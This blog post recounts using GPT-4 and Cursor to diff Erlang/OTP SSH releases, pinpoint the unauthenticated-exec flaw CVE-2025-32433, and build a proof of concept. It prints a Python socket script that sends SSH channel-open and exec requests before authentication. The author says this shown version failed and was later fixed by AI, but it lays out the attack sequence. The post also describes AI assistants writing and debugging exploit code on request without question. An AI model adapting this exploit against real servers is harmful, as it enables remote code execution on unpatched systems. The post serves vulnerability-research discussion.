How I Used AI to Create a Working Exploit for CVE-2025-32433 Before Public PoCs Existed

🪴 Anil's Garden

Writing the Proof of Concept for CVE-2025-32433

Let’s go on a little journey.

I’m drinking my coffee, scrolling through Twitter, and there it is — this tweet from Horizon3:

👉 https://x.com/Horizon3Attack/status/1912945580902334793

They’ve got a proof of concept for CVE-2025-32433. They say it was “surprisingly easy.” But they didn’t drop the code. Hmm.

Naturally, I thought: If it’s that easy… can AI just write it for me?

🤖 AI-Driven Exploits?

Turns out — yeah, it kinda can.

GPT-4 not only understood the CVE description, but it also figured out what commit introduced the fix, compared that to the older code, found the diff, located the vuln, and even wrote a proof of concept. When it didn’t work? It debugged it and fixed it too.

Let’s walk through how I got there.

📸 The Initial Clue

The first thing I did was grab the Python output visible in Horizon3's animated GIF. It wasn't much, but it felt useful to hand to GPT.

[Image: Horizon3 Tweet]

A little nudge in the right direction never hurts.

📎 Finding the Versions

Next up: I checked out the official Erlang advisory on GitHub to find both an affected version and a patched one.

[Image: Affected and Patched Versions]

I knew I'd want to diff these versions, so I asked GPT how to snapshot both of them. Here's what it spat out:

# Snapshot the vulnerable ssh application (ssh-5.2.9)
git checkout OTP-27.3.1
mkdir -p ../ssh_5_2_9
cp -a lib/ssh/* ../ssh_5_2_9/

# Checkout the commit that introduces ssh-5.2.10
git checkout 71219a5123309c8cf66f929a19a100a242e15681
mkdir -p ../ssh_5_2_10
cp -a lib/ssh/* ../ssh_5_2_10/

It even explained what was happening in each step. Helpful! At this point, I had two snapshots: ssh_5_2_9 (vulnerable) and ssh_5_2_10 (patched). Time to diff.
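Before diffing line by line, it can help to confirm that the two snapshots really differ and to see which files were added or removed outright. Here is a minimal sketch using the standard library's filecmp module. The helper name snapshot_changes is made up for illustration and is not something GPT produced; the directory names are the ones from the commands above.

```python
import filecmp
import os

def snapshot_changes(old_dir, new_dir):
    """Recursively collect relative paths that were changed, added, or removed."""
    changed, added, removed = [], [], []

    def walk(cmp, prefix=""):
        # diff_files: present on both sides but different
        changed.extend(os.path.join(prefix, n) for n in cmp.diff_files)
        # left_only / right_only: present in just one snapshot
        removed.extend(os.path.join(prefix, n) for n in cmp.left_only)
        added.extend(os.path.join(prefix, n) for n in cmp.right_only)
        for name, sub in cmp.subdirs.items():
            walk(sub, os.path.join(prefix, name))

    walk(filecmp.dircmp(old_dir, new_dir))
    return sorted(changed), sorted(added), sorted(removed)

if __name__ == "__main__":
    old_dir, new_dir = "../ssh_5_2_9", "../ssh_5_2_10"
    if os.path.isdir(old_dir) and os.path.isdir(new_dir):
        for label, paths in zip(("changed", "added", "removed"),
                                snapshot_changes(old_dir, new_dir)):
            print(f"{label}: {len(paths)}")
            for p in paths:
                print(f"  {p}")
```

One caveat: dircmp compares files "shallowly" by default (type, size, and modification time), so treat this as a quick overview rather than proof that two files are identical.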

🔍 diff.py — Our Code Archaeologist

GPT gave me this small but mighty Python script to recursively diff the two versions:

import os
import difflib

def get_source_files(base_dir):
    """Map each .erl/.hrl path (relative to base_dir) to its full path."""
    return {
        os.path.relpath(os.path.join(root, f), base_dir): os.path.join(root, f)
        for root, _, files in os.walk(base_dir)
        for f in files if f.endswith((".erl", ".hrl"))
    }

def safe_readlines(path):
    """Read a file as text, falling back to latin-1 if it is not valid UTF-8."""
    for enc in ("utf-8", "latin-1"):
        try:
            with open(path, "r", encoding=enc) as f:
                return f.readlines()
        except UnicodeDecodeError:
            continue
    return None

def compare_versions(dir1, dir2):
    """Return {relative_path: unified diff lines} for files that differ."""
    files1, files2 = get_source_files(dir1), get_source_files(dir2)
    diffs = {}
    # Only files present in both snapshots are compared
    for path in sorted(set(files1) & set(files2)):
        old, new = safe_readlines(files1[path]), safe_readlines(files2[path])
        if old is None or new is None:
            continue
        diff = list(difflib.unified_diff(
            old, new,
            fromfile=f"{os.path.basename(dir1)}/{path}",
            tofile=f"{os.path.basename(dir2)}/{path}"))
        if diff:  # skip files that are identical in both versions
            diffs[path] = diff
    return diffs

# Run diff and print results
base1, base2 = "../ssh_5_2_9", "../ssh_5_2_10"
diffs = compare_versions(base1, base2)

print("\n🔍 Changed Files Between SSH 5.2.9 and 5.2.10 (Recursive):")
print("---------------------------------------------------------")
for f, lines in diffs.items():
    # Counts every line of diff output, including headers and context
    print(f"{f}: {len(lines)} diff lines")

print("\n\n📄 Full Diffs for All Changed Files:\n")
print("=====================================")
for f, lines in diffs.items():
    print(f"\n--- {f} ---\n{''.join(lines)}")

This script walks every .erl and .hrl file that exists in both snapshots, compares them line by line, and prints both a summary and the full unified diff. Files that exist in only one of the two versions are not compared.
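One caveat when reading the summary: the length of a unified diff includes file headers, hunk markers, and context lines, so it is larger than the number of lines that actually changed. Here is a minimal sketch of counting real additions and removals instead. count_changes is a hypothetical helper for illustration, not part of the script GPT produced, and the sample lines are made up.

```python
import difflib
from itertools import islice

def count_changes(old_lines, new_lines):
    """Return (added, removed) line counts taken from a unified diff."""
    diff = difflib.unified_diff(old_lines, new_lines, lineterm="")
    added = removed = 0
    # The first two lines are the "---" / "+++" file headers; skip them
    for line in islice(diff, 2, None):
        if line.startswith("+"):
            added += 1
        elif line.startswith("-"):
            removed += 1
    return added, removed

old = ["a\n", "b\n", "c\n"]
new = ["a\n", "B\n", "c\n", "d\n"]
print(count_changes(old, new))  # (2, 1): "B" and "d" added, "b" removed
```

Skipping the headers by position, rather than by checking for a "---" prefix, avoids miscounting a removed line whose own text happens to start with dashes.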

So we got back a long list of diffs that looked something like:

....omitted for brevity...
+early_rce(Config) ->
+    ...
+    TypeReq = "exec",
+    DataReq = <<?STRING(<<"lists:seq(1,10).">>)>>,
+    ...
+    {send, SshMsgChannelRequest},
+    {match, disconnect(), receive_msg}
....omitted for brevity...

Yeah — this was big. I won’t paste the whole thing here because we’d be scrolling forever.

So (and you probably saw this coming)… I gave it to ChatGPT and just said:

“Hey, can you tell me what caused this vulnerability?”

[Image: GPT Find The Bug!]

🤯 GPT’s Take: Actually Insightful

GPT didn’t just guess. It explained the why behind the vulnerability, walking through the change in logic that introduced protection against unauthenticated messages — protection that didn’t exist before.

Here’s the relevant patch that fixed it:

+handle_msg(Msg, Connection, server, Ssh = #ssh{authenticated = false}) ->
+    %% RFC4252 Section 6: Reject protocol messages before authentication.
+    MsgFun = fun(M) ->
+                     MaxLogItemLen = ?GET_OPT(max_log_item_len, Ssh#ssh.opts),
+                     io_lib:format("Connection terminated. Unexpected message for unauthenticated user."
+                                   " Message:  ~w", [M],
+                                   [{chars_limit, MaxLogItemLen}])
+             end,
+    ?LOG_DEBUG(MsgFun, [Msg]),
+    {disconnect, {?SSH_DISCONNECT_PROTOCOL_ERROR, "Connection refused"}, handle_stop(Connection)};

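Boom. That's the key right there. Prior to this patch, the server had no such guard: a client that had not authenticated could send connection-protocol messages, such as the channel "exec" request in the early_rce test above, and the server would handle them instead of disconnecting.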
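To make the logic of the fix concrete, here is a small Python model of the same idea: refuse connection-protocol messages until the session is authenticated. This is only an illustrative sketch, not the Erlang implementation. Session, gate, and the return strings are invented names; the message-number range for the connection protocol (80 to 127) comes from RFC 4250.

```python
from dataclasses import dataclass

# SSH connection-protocol message numbers, per RFC 4250
FIRST_CONNECTION_MSG = 80
LAST_CONNECTION_MSG = 127

SSH_MSG_KEXINIT = 20          # transport layer, legal before auth
SSH_MSG_CHANNEL_OPEN = 90     # connection protocol
SSH_MSG_CHANNEL_REQUEST = 98  # connection protocol (carries "exec")

@dataclass
class Session:
    authenticated: bool = False

def gate(session, msg_type):
    """Decide what a server should do with an incoming message type."""
    is_connection_msg = FIRST_CONNECTION_MSG <= msg_type <= LAST_CONNECTION_MSG
    if is_connection_msg and not session.authenticated:
        # Mirrors the patched behavior: drop the connection
        return "disconnect"
    return "dispatch"

print(gate(Session(), SSH_MSG_KEXINIT))                             # dispatch
print(gate(Session(), SSH_MSG_CHANNEL_REQUEST))                     # disconnect
print(gate(Session(authenticated=True), SSH_MSG_CHANNEL_REQUEST))   # dispatch
```

The vulnerable versions effectively lacked the "disconnect" branch, which is why the regression test in the diff expects a disconnect after an early exec request.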

Now we knew what was broken. We knew how it got fixed. All that was left? Trigger it.

🧪 GPT Offers Options (Because of Course It Did)

Classic GPT move — it asked me:

“Want a full PoC client? A Metasploit-style demo? A patched SSH server to trace further?”

Yes. All of it. Let’s start with the PoC.

💥 The First Proof of Concept (PoC)

Here’s what GPT generated. It was raw — just a Python socket script that tries to open a channel and send a command before authentication finishes.

import socket
import struct
 
HOST = "127.0.0.1"  # Change to vulnerable SSH server IP
PORT = 2222         # Change to correct SSH port
 
# Utilities
def string_payload(s):
    s_bytes = s.encode("utf-8")
    return struct.pack(">I", len(s_bytes)) + s_bytes
 
def build_channel_open(channel_id=0):
    return (
        b"\x5a" +  # SSH_MSG_CHANNEL_OPEN
        string_payload("session") +
        struct.pack(">I", channel_id) +  # sender channel
        struct.pack(">I", 0x68000) +     # initial window size
        struct.pack(">I", 0x10000) +     # max packet size
        b""
    )
 
def build_channel_request(channel_id=0, command="file:write_file(\"/lab.txt\", <<\"pwned\">>)."):
    payload = (
        b"\x62" +
        struct.pack(">I", channel_id) +
        string_payload("exec") +
        b"\x01" +
        string_payload(command)
    )
    return payload
 
def build_kexinit():
    cookie = b"\x00" * 16
    def name_list(l): return string_payload(",".join(l))
    return (
        b"\x14" + cookie +
        name_list(["diffie-hellman-group14-sha1"]) +
        name_list(["ssh-rsa"]) +
        name_list(["aes128-ctr"]) * 2 +
        name_list(["hmac-sha1"]) * 2 +
        name_list(["none"]) * 2 +
        name_list([]) * 2 +
        b"\x00" + struct.pack(">I", 0)
    )
 
# Step-by-step protocol
with socket.create_connection((HOST, PORT)) as s:
    print("[*] Connecting to SSH server...")
 
    s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
    banner = s.recv(1024)
    print(f"[+] Received banner: {banner.strip().decode(errors='ignore')}")
 
    print("[*] Sending KEXINIT...")
    kex_packet = build_kexinit()
    kex_len = struct.pack(">I", len(kex_packet) + 1)
    kex = kex_len + b"\x0a" + kex_packet + b"\x00" * 6
    s.sendall(kex)
 
    print("[*] Sending channel_open...")
    chan_open = build_channel_open()
    chan_len = struct.pack(">I", len(chan_open) + 1)
    s.sendall(chan_len + b"\x0a" + chan_open + b"\x00" * 6)
 
    print("[*] Sending channel_request with exec payload...")
    chan_req = build_channel_request(command='file:write_file("/lab.txt", <<"pwned">>).')
    req_len = struct.pack(">I", len(chan_req) + 1)
    s.sendall(req_len + b"\x0a" + chan_req + b"\x00" * 6)
 
    print("[✓] Exploit sent. If target was vulnerable, it attempted to write /lab.txt.")

🛠️ Debugging with Cursor

No surprise here: the initial code didn’t work.

So I pivoted. Since this was becoming more code-heavy, I opened up Cursor, loaded in the code, opened a terminal, and just asked:

“Fix the PoC code?”

[Image: Cursor... or expert hacker?]

No detailed guidance. No constraints. Just a dev terminal, the broken script, and a hopeful prompt.

To my surprise?

It worked.

Cursor (running Claude 3.7 Sonnet) fixed the issues, reshaped the protocol messages, and got it working.

[Image: CVE Execution]

I ran the fixed version, and it successfully wrote to /lab.txt on my test system. A clean, working, fully AI-generated exploit for a CVE that had no public PoC at the time.

🎉 Final Thoughts

That’s it. From a tweet → to digging into diffs → to full PoC exploit — all with no prior public code to start from. And most of it done by AI.

Wild.

This opens up some serious questions about how quickly AI can assist in vulnerability research — or even automate entire chunks of it. We’re watching a new era of security tooling come to life.

Closing Thoughts

What started as curiosity about a tweet turned into a deep exploration of how AI is changing vulnerability research. A few years ago, this process would have required specialized Erlang knowledge and hours of manual debugging. Today, it took an afternoon with the right prompts.

Is this good or concerning? Probably both. It democratizes security research while potentially lowering the barrier for exploit development. But that’s precisely why responsible disclosure and collaborative security practices matter more than ever.

Huge thanks to Horizon3 and Fabian Baeumer for their responsible disclosure of this vulnerability. Their work continues to make the security community stronger.